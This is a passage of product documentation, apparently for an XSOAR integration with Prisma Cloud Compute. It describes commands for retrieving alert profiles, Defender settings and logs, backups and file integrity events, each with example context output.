PrismaCloudCompute.AlertProfiles.SecurityCenter.EnabledBooleanWhether the security center is enabled.
PrismaCloudCompute.AlertProfiles.SecurityCenter.SourceIDStringThe security center source ID.
PrismaCloudCompute.AlertProfiles.SecurityHub.AccountIDStringThe security hub account ID.
PrismaCloudCompute.AlertProfiles.SecurityHub.CredentialIdStringThe security hub credential ID.
PrismaCloudCompute.AlertProfiles.SecurityHub.EnabledBooleanWhether the security hub is enabled.
PrismaCloudCompute.AlertProfiles.SecurityHub.RegionStringThe security hub region.
PrismaCloudCompute.AlertProfiles.ServiceNow.ApplicationStringThe ServiceNow application.
PrismaCloudCompute.AlertProfiles.ServiceNow.AssigneeStringThe ServiceNow assignee.
PrismaCloudCompute.AlertProfiles.ServiceNow.CredentialIDStringThe ServiceNow credential ID.
PrismaCloudCompute.AlertProfiles.ServiceNow.ProjectStringThe ServiceNow project.
PrismaCloudCompute.AlertProfiles.Slack.EnabledBooleanWhether the Slack alert profile is enabled.
PrismaCloudCompute.AlertProfiles.Slack.WebhookUrlStringThe Slack URL.
PrismaCloudCompute.AlertProfiles.Splunk.AuthToken.EncryptedStringThe Splunk auth token.
PrismaCloudCompute.AlertProfiles.Splunk.SourceTypeStringThe Splunk source type.
PrismaCloudCompute.AlertProfiles.Splunk.UrlStringThe Splunk URL.
PrismaCloudCompute.AlertProfiles.VulnerabilityImmediateAlertsEnabledBooleanWhether the vulnerability alert is enabled.
PrismaCloudCompute.AlertProfiles.Webhook.CredentialIdStringThe webhook credential ID.
PrismaCloudCompute.AlertProfiles.Webhook.UrlStringThe webhook URL.
PrismaCloudCompute.AlertProfiles._IdStringThe alert profile ID.

Command example#

!prisma-cloud-compute-get-alert-profiles

Context Example#

{
"PrismaCloudCompute": {
"AlertProfiles": {
"Cortex": {
"Application": "xsoar",
"CredentialId": "",
"Enabled": true,
"Url": ""
},
"Email": {
"CredentialId": "",
"Enabled": false,
"From": "",
"Port": 0,
"SmtpAddress": "",
"Ssl": false
},
"GcpPubsub": {
"CredentialId": "",
"Enabled": false,
"Topic": ""
},
"Jira": {
"Assignee": {},
"BaseUrl": "",
"CaCert": "",
"CredentialId": "",
"Enabled": false,
"IssueType": "",
"Labels": {},
"Priority": "",
"ProjectKey": {}
},
"LastError": "",
"Modified": "2023-04-03T18:43:05.575Z",
"Name": "XSOAR",
"Owner": "admin",
"Pagerduty": {
"RoutingKey": {
"Encrypted": ""
},
"Severity": "",
"Summary": ""
},
"Policy": {
"Admission": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"AgentlessAppFirewall": {
"AllRules": true,
"Enabled": true,
"Rules": []
},
"AppEmbeddedAppFirewall": {
"AllRules": true,
"Enabled": true,
"Rules": []
},
"AppEmbeddedRuntime": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"CloudDiscovery": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"CodeRepoVulnerability": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"ContainerAppFirewall": {
"AllRules": true,
"Enabled": true,
"Rules": []
},
"ContainerCompliance": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"ContainerComplianceScan": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"ContainerRuntime": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"ContainerVulnerability": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"Defender": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"Docker": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"HostAppFirewall": {
"AllRules": true,
"Enabled": true,
"Rules": []
},
"HostCompliance": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"HostComplianceScan": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"HostRuntime": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"HostVulnerability": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"Incident": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"KubernetesAudit": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"NetworkFirewall": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"RegistryVulnerability": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"ServerlessAppFirewall": {
"AllRules": true,
"Enabled": true,
"Rules": []
},
"ServerlessRuntime": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"VmCompliance": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"VmVulnerability": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"WaasHealth": {
"AllRules": true,
"Enabled": true,
"Rules": []
}
},
"PreviousName": "",
"SecurityAdvisor": {
"CredentialID": "",
"Enabled": false,
"FindingsURL": "",
"ProviderId": "",
"TokenURL": ""
},
"SecurityCenter": {
"CredentialId": "",
"Enabled": false,
"SourceID": ""
},
"SecurityHub": {
"AccountID": "",
"CredentialId": "",
"Enabled": false,
"Region": ""
},
"ServiceNow": {
"Application": "",
"Assignee": "",
"CredentialID": "",
"Project": ""
},
"Slack": {
"Enabled": false,
"WebhookUrl": ""
},
"Splunk": {
"AuthToken": {
"Encrypted": ""
},
"SourceType": "",
"Url": ""
},
"Sqs": {},
"VulnerabilityImmediateAlertsEnabled": false,
"Webhook": {
"CredentialId": "",
"Url": ""
},
"_Id": "XSOAR"
}
}
}

Human Readable Output#

Alert Profiles#

admissionagentlessAppFirewallappEmbeddedAppFirewallappEmbeddedRuntimecloudDiscoverycodeRepoVulnerabilitycontainerAppFirewallcontainerCompliancecontainerComplianceScancontainerRuntimecontainerVulnerabilitydefenderdockerhostAppFirewallhostCompliancehostComplianceScanhostRuntimehostVulnerabilityincidentkubernetesAuditnetworkFirewallregistryVulnerabilityserverlessAppFirewallserverlessRuntimevmCompliancevmVulnerabilitywaasHealth
enabled: false
allRules: true
rules:
enabled: true
allRules: true
rules:
enabled: true
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: true
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: true
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: true
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: true
allRules: true
rules:

prisma-cloud-compute-get-settings-defender#


Get the Defender settings.

Base Command#

prisma-cloud-compute-get-settings-defender

Input#

Argument NameDescriptionRequired
hostnameThe Defender hostname.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.DefenderSettings.AdmissionControlEnabledBooleanThe admission control setting.
PrismaCloudCompute.DefenderSettings.AdmissionControlWebhookSuffixStringThe webhook suffix.
PrismaCloudCompute.DefenderSettings.AppEmbeddedFileSystemTracingEnabledBooleanThe file tracing setting.
PrismaCloudCompute.DefenderSettings.AutomaticUpgradeBooleanThe automatic upgrade setting.
PrismaCloudCompute.DefenderSettings.DisconnectPeriodDaysNumberThe disconnect period in days.
PrismaCloudCompute.DefenderSettings.HostCustomComplianceEnabledBooleanThe custom compliance setting.
PrismaCloudCompute.DefenderSettings.ListeningPortNumberThe defender listening port.

Command example#

!prisma-cloud-compute-get-settings-defender

Context Example#

{
"PrismaCloudCompute": {
"DefenderSettings": {
"AdmissionControlEnabled": false,
"AdmissionControlWebhookSuffix": "sdgfskdjfbsdkfbsdkjfbsdkfbksdjbf",
"AppEmbeddedFileSystemTracingEnabled": false,
"AutomaticUpgrade": false,
"DisconnectPeriodDays": 1,
"HostCustomComplianceEnabled": false,
"ListeningPort": 9998
}
}
}

Human Readable Output#

Results#

AdmissionControlEnabledAdmissionControlWebhookSuffixAppEmbeddedFileSystemTracingEnabledAutomaticUpgradeDisconnectPeriodDaysHostCustomComplianceEnabledListeningPort
falsesdgfskdjfbsdkfbsdkjfbsdkfbksdjbffalsefalse1false9998

prisma-cloud-compute-logs-defender#


Download the Defender logs.

Base Command#

prisma-cloud-compute-logs-defender

Input#

Argument NameDescriptionRequired
hostnameThe Defender hostname.Optional
linesThe number of log lines to fetch. Default is 10.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.Defenders.HostnameStringThe hostname the log was retrieved from.
PrismaCloudCompute.Defenders.Logs.LevelStringThe log level.
PrismaCloudCompute.Defenders.Logs.LogStringThe log message.
PrismaCloudCompute.Defenders.Logs.TimeDateThe time of the log.

Command example#

!prisma-cloud-compute-logs-defender hostname=test-host.internal lines=2

Context Example#

{
"PrismaCloudCompute": {
"Defenders": {
"Hostname": "test-host.internal",
"Logs": [
{
"Level": "DEBUG",
"Log": "defender.go:2042 Received upload logs message: &{DestLogs:defender_1681221297.tar.gz Lines:2}",
"Time": "2023-04-11T13:54:57.862Z"
},
{
"Level": "DEBUG",
"Log": "ws.go:517 Received message with type uploadLogs",
"Time": "2023-04-11T13:54:57.861Z"
}
]
}
}
}

Human Readable Output#

Logs#

levellogtime
DEBUGdefender.go:2042 Received upload logs message: &{DestLogs:defender_1681221297.tar.gz Lines:2}2023-04-11T13:54:57.862Z
DEBUGws.go:517 Received message with type uploadLogs2023-04-11T13:54:57.861Z

prisma-cloud-compute-logs-defender-download#


Download a zip of all Defender logs.

Base Command#

prisma-cloud-compute-logs-defender-download

Input#

Argument NameDescriptionRequired
hostnameThe Defender hostname.Optional
linesThe number of log lines to fetch. Default is 100.Optional

Context Output#

PathTypeDescription
InfoFile.NameStringThe file name.
InfoFile.EntryIDStringThe File entry ID.
InfoFile.SizeNumberThe file size.
InfoFile.TypeStringThe file type.
InfoFile.InfoStringBasic information of the file.
InfoFile.ExtensionStringFile extension.

Command example#

!prisma-cloud-compute-logs-defender-download hostname=`test-host.internal` lines=2

Context Example#

{
"InfoFile": {
"EntryID": "355@d93bd179-ac81-4015-8ddc-c904349d83e0",
"Extension": "gz",
"Info": "application/gzip",
"Name": "test-host.internal",
"Size": 682469,
"Type": "gzip compressed data"
}
}

prisma-cloud-compute-get-backups#


Returns the available backups.

Base Command#

prisma-cloud-compute-get-backups

Input#

Argument NameDescriptionRequired
projectThe project to retrieve the backups from.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.Backups.IdStringThe ID of the backup.
PrismaCloudCompute.Backups.NameStringThe name of the backup.
PrismaCloudCompute.Backups.ReleaseStringThe release of the backup.
PrismaCloudCompute.Backups.TimeDateThe time of the backup.

Command example#

!prisma-cloud-compute-get-backups

Context Example#

{
"PrismaCloudCompute": {
"Backups": [
{
"Id": "daily-22.12.585-1681184909.tar.gz",
"Name": "daily",
"Release": "22.12.585",
"Time": "2023-04-11T03:48:29Z"
},
{
"Id": "monthly-22.12.585-1679972425.tar.gz",
"Name": "monthly",
"Release": "22.12.585",
"Time": "2023-03-28T03:00:25Z"
},
{
"Id": "weekly-22.12.585-1681184909.tar.gz",
"Name": "weekly",
"Release": "22.12.585",
"Time": "2023-04-11T03:48:29Z"
}
]
}
}

Human Readable Output#

Results#

IdNameReleaseTime
daily-22.12.585-1681184909.tar.gzdaily22.12.5852023-04-11T03:48:29Z
monthly-22.12.585-1679972425.tar.gzmonthly22.12.5852023-03-28T03:00:25Z
weekly-22.12.585-1681184909.tar.gzweekly22.12.5852023-04-11T03:48:29Z

prisma-cloud-compute-get-file-integrity-events#


Base Command#

prisma-cloud-compute-get-file-integrity-events

Input#

Argument NameDescriptionRequired
hostnameHostname for which to get runtime file integrity audit events. Either event_id or hostname is required.Optional
event_idEvent ID of runtime file integrity audit event for which to get details. Either event_id or hostname is required.Optional
limitLimit on number of events to return. Only relevant if filtering by hostname. Default is 10.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.FileIntegrity.PathstringThe absolute path of the event.
PrismaCloudCompute.FileIntegrity.RuleNamestringThe name of the applied rule for auditing file integrity rules.
PrismaCloudCompute.FileIntegrity.AccountIDstringThe cloud account ID.
PrismaCloudCompute.FileIntegrity.UserstringThe user that initiated the event.
PrismaCloudCompute.FileIntegrity.TimedateThe time of the event.
PrismaCloudCompute.FileIntegrity.HostnamestringThe hostname on which the event was found.
PrismaCloudCompute.FileIntegrity.EventTypestringRepresents the type of the file integrity event. Possible values: [metadata,read,write].
PrismaCloudCompute.FileIntegrity.CollectionsunknownCollections to which this event applies.
PrismaCloudCompute.FileIntegrity.FqdnstringThe current fully qualified domain name used in audit alerts.
PrismaCloudCompute.FileIntegrity.FileTypenumberRepresents the file type.
PrismaCloudCompute.FileIntegrity.ProcessNamestringThe name of the process that initiated the event.
PrismaCloudCompute.FileIntegrity.ClusterstringThe cluster on which the event was found.
PrismaCloudCompute.FileIntegrity._IdstringThe activity's unique identifier.
PrismaCloudCompute.FileIntegrity.DescriptionunknownA human readable description of the action performed on the path.

Command example#

!prisma-cloud-compute-get-file-integrity-events hostname=host123 limit=3

Context Example#

{
"PrismaCloudCompute": {
"FileIntegrity": [
{
"AccountID": "123",
"Cluster": "",
"Collections": [
"All",
"123"
],
"Description": "Process touch wrote to path (user: root)",
"EventType": "write",
"FileType": 2,
"Fqdn": "",
"Hostname": "host123",
"Path": "/tmp/alert/test1",
"ProcessName": "touch",
"RuleName": "Default - alert on suspicious runtime behavior",
"Time": "2023-08-30T01:16:01.037Z",
"User": "root",
"_Id": "64ee985138b8ac44a6f3d468"
},
{
"AccountID": "123",
"Cluster": "",
"Collections": [
"All",
"123"
],
"Description": "Process touch wrote to path (user: root)",
"EventType": "write",
"FileType": 2,
"Fqdn": "",
"Hostname": "host123",
"Path": "/tmp/alert/test1",
"ProcessName": "touch",
"RuleName": "Default - alert on suspicious runtime behavior",
"Time": "2023-08-30T00:16:01.883Z",
"User": "root",
"_Id": "64ee8a4138b8ac44a6f3d460"
},
{
"AccountID": "123",
"Cluster": "",
"Collections": [
"All",
"123"
],
"Description": "Process touch wrote to path (user: root)",
"EventType": "write",
"FileType": 2,
"Fqdn": "",
"Hostname": "host123",
"Path": "/tmp/alert/test1",
"ProcessName": "touch",
"RuleName": "Default - alert on suspicious runtime behavior",
"Time": "2023-08-29T23:16:01.673Z",
"User": "root",
"_Id": "64ee7c3138b8ac44a6f3d458"
}
]
}
}

Human Readable Output#

Results#

AccountIDClusterCollectionsDescriptionEventTypeFileTypeFqdnHostnamePathProcessNameRuleNameTimeUser_Id
123All,
123
Process touch wrote to path (user: root)write2host123/tmp/alert/test1touchDefault - alert on suspicious runtime behavior2023-08-30T01:16:01.037Zroot64ee985138b8ac44a6f3d468
123All,
123
Process touch wrote to path (user: root)write2host123/tmp/alert/test1touchDefault - alert on suspicious runtime behavior2023-08-30T00:16:01.883Zroot64ee8a4138b8ac44a6f3d460
123All,
123
Process touch wrote to path (user: root)write2host123/tmp/alert/test1touchDefault - alert on suspicious runtime behavior2023-08-29T23:16:01.673Zroot64ee7c3138b8ac44a6f3d458

prisma-cloud-compute-unstuck-fetch-stream#


Use this command to unstuck the fetch stream in case it's getting duplicated incidents.

Base Command#

prisma-cloud-compute-unstuck-fetch-stream

Input#

  • No input.

Context Output#

  • No context output for this command.

Command example#

!prisma-cloud-compute-unstuck-fetch-stream

Human Readable Output#

The fetch stream was released successfully.

General Note:#

  • Do not use the reset last run button as it will cause incidents duplications to the instance.
  • In case you pressed reset last run button and you get duplicated incidents, run prisma-cloud-compute-unstuck-fetch-stream command.